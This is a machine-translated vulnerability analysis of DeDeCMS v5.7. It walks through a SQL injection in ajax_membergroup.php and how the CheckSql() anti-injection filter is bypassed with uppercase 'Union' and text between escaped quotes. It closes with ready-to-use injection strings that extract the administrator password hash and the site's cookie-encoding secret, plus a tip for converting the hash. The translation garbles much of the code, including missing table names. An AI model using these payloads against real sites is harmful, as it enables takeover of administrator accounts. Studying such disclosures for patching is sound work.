DeDeCMS v5.7 latest vulnerability analysis

DeDeCMS is a professional PHP website content management system in China. It has been released in the past seven years and has undergone numerous upgrades and revisions, the latest version is the official version of V5.7, which was updated on April 9, August 12. Its functions are constantly improved. I originally thought this should be a CMS system with high security. However, after the analysis, it was confusing. The security of the Professional System in China was still worrying after seven years of development. Maybe the network is not absolutely secure.
Injection Vulnerability
Vulnerability 1: The membergroup variable on the/member/ajax_membergroup.php page is not filtered, leading to digital injection. The key code is as follows:
 
Edit Group
Elseif ($ action = 'post ')
{
If (empty ($ membergroup )){
Echo "You have not set a group! ";
Exit;
}
$ SQL = "UPDATE 'set' groupid '=' {$ membergroup} 'WHERE 'fid' =' {$ mid} 'AND 'mid' = '{$ pai_ml-> M_ID }'; ";
$ Dsql-> ExecuteNoneQuery ($ SQL );
$ Row = $ dsql-> GetOne ("SELECT groupname from where mid = {$ cmd_ml-> M_ID} AND id = {$ membergroup}"); // numeric Injection
Echo "& nbsp ;". $ row ['groupname']. "& nbsp; <a href = '# 'onclick = 'editmembergroup ($ mid); return false;'> modify </a> ";
 
Obviously, $ membergroup causes a digital injection vulnerability when "action = post". However, before accessing the MySql database, DeDeCMS uses the CheckSql () custom function to perform security checks on SQL statements, cannot be injected directly.
Bypass anti-injection. The CheckSql () function is defined in the/include/dedesql. class. php or/include/dededesqli. class. php database class file. The Code is as follows:
 
If (! Function_exists ('checksql '))
{Function CheckSql ($ db_string, $ querytype = 'select ')
{Global $ cook_cookie_encode;
$ Clean = ''; $ error =''; $ old_pos = 0; $ pos =-1;
... (Omitted)
// For common query statements, filter some special syntaxes directly
If ($ querytype = 'select ')
{$ Notallow1 = "[^ 0-9a-z @\. _-] {1,} (union | sleep | benchmark | load_file | outfile) [^ 0-9a-z @\. -] {1 ,}";
// [^ 0-9a-z @ \. _-] {1,} indicates at least one non-digit, lowercase letter, @, and other characters,
If (preg_match ("/". $ notallow1. "/", $ db_string ))
{// ① Preg_match the parameter I is not used and is bypassed in uppercase, for example, Union
Puts (fopen ($ log_file, 'a + '), "$ userIP | $ getUrl | $ db_string | SelectBreak \ r \ n ");
Exit ("<font size = '5' color = 'red'> Safe Alert: Request Error step 1! </Font> ");
}
}
While (TRUE)
{$ Pos = strpos ($ db_string, '\ '', $ pos + 1 );
If ($ pos = FALSE)
{Break ;}
// ② If the string $ db_string does not contain "\" and exits the while LOOP, continue to execute
$ Clean. = substr ($ db_string, $ old_pos, $ pos-$ old_pos );
While (TRUE)
{... (Omitted )}
$ Clean. = '$ s $ ';
// ③ Convert the characters between "\ '" and "\'" in the string $ db_string to "$ s $", that is, the string between the trust, bypassing the key of anti-Injection
$ Old_pos = $ pos + 1;
}
..... (Continue with the following code)
}
}
$ Clean. = substr ($ db_string, $ old_pos );
$ Clean = trim (strtolower (preg_replace (array ('~ \ S ++ ~ S '), array (''), $ clean )));
// ④ "\ S" matches any blank characters, including spaces, tabs, and page breaks. convert $ clean to lowercase.
// ⑤ Check the union keyword again
If (strpos ($ clean, 'Union ')! = FALSE & preg_match ('~ (^ | [^ A-z]) union ($ | [^ [a-z]) ~ S', $ clean )! = 0)
{
$ Fail = TRUE;
$ Error = "union detect ";
}
 
// 6 check keywords in sequence such as --, #, benchmark, load_file, outfile, and select
Elseif (strpos ($ clean, '/*')> 2 | strpos ($ clean ,'--')! = FALSE | strpos ($ clean ,'#')! = FALSE)
{... (Omitted )}
// These functions will not be used, but hackers will use them to operate files and drop the database.
Elseif (strpos ($ clean, 'Sleep ')! = FALSE & preg_match ('~ (^ | [^ A-z]) sleep ($ | [^ [a-z]) ~ S', $ clean )! = 0)
... (Omitted)
// MYSQL of the old version does not support subqueries, which may be rarely used in our programs, but hackers can use it to query sensitive database information.
Elseif (preg_match ('~ \ ([^)] *? Select ~ S', $ clean )! = 0)
{... (Www.2cto.com )}
If (! Empty ($ fail ))
{// If there are restricted SQL keywords, write the log file $ log_file and output "Safe Alert: Request Error step 2 !"
Fputs (fopen ($ log_file, 'a + '), "$ userIP | $ getUrl | $ db_string | $ error \ r \ n ");
Exit ("<font size = '5' color = 'red'> Safe Alert: Request Error step 2! </Font> ");
}
Else
{// 7. If the SQL keyword is not restricted, the $ db_string string is returned.
Return $ db_string;
}
 
Statement ① uses a regular expression to filter SQL keywords. However, because the parameter "I" is not provided, the SQL keyword can be bypassed in uppercase, such as "Union". The While LOOP implements the string (SQL statement) the conversion between the escape single quotes is converted into "$ s $" and will not be checked. The intention is to trust the characters between the escape single quotes, that is, to allow the submission of text containing SQL keywords, for example, the content of a new article has also produced a security vulnerability.
Vulnerability exploitation. The variable value for constructing membergroup is 'Union select pwd from 'where 1 or '. Note: 1) "Union" cannot all be lower case "Union", and 2) use '". After the variable is submitted, the SQL statement becomes "SELECT groupname FROM WHERE mid = 8 AND 'Union select pwd from 'where 1 or '", AND the mid is the current user ID, first, the uppercase Union statement bypasses the anti-injection statement ①, and then the anti-injection Statement considers the strings between "\" to be trustable and does not provide anti-injection filter for the strings in it, although it contains keywords such as "union, select! Add the following output statement to the CheckSql () function to view the SQL statement before and after conversion and the injection result 1 .... (Omitted)
Echo "original string:". $ db_string. "<br> ";
// Complete SQL check
While (TRUE)
{
... (Omitted)
}
$ Clean. = substr ($ db_string, $ old_pos );
$ Clean = trim (strtolower (preg_replace (array ('~ \ S ++ ~ S '), array (''), $ clean )));
Echo "after conversion:". $ clean. "<br> ";
... (Omitted
 
 
 
Here we note the value of substr (md5 ($ this-> userPwd), 5, 20). We can remove the first three digits and the last digit to become the 16-bit MD5 code, for example, "7a57a5a743894a0e. Common injection links are as follows:
 
Inject administrator password:
'Union select pwd from 'where 1 or'
// If multiple administrators exist, you can change the where condition to "id = 1 or" or "userid = 0x61646D696E or '"
Inject $ cook_cookie_encode
'Union select value from 'where aid = 3 or'
// After obtaining $ cook_cookie_encode, we can directly exploit vulnerability 2. In addition, the injection trace is recorded in the "/data/'.md5(1_1__cookie_encode=.'_safe.txt '" file.

Author loveless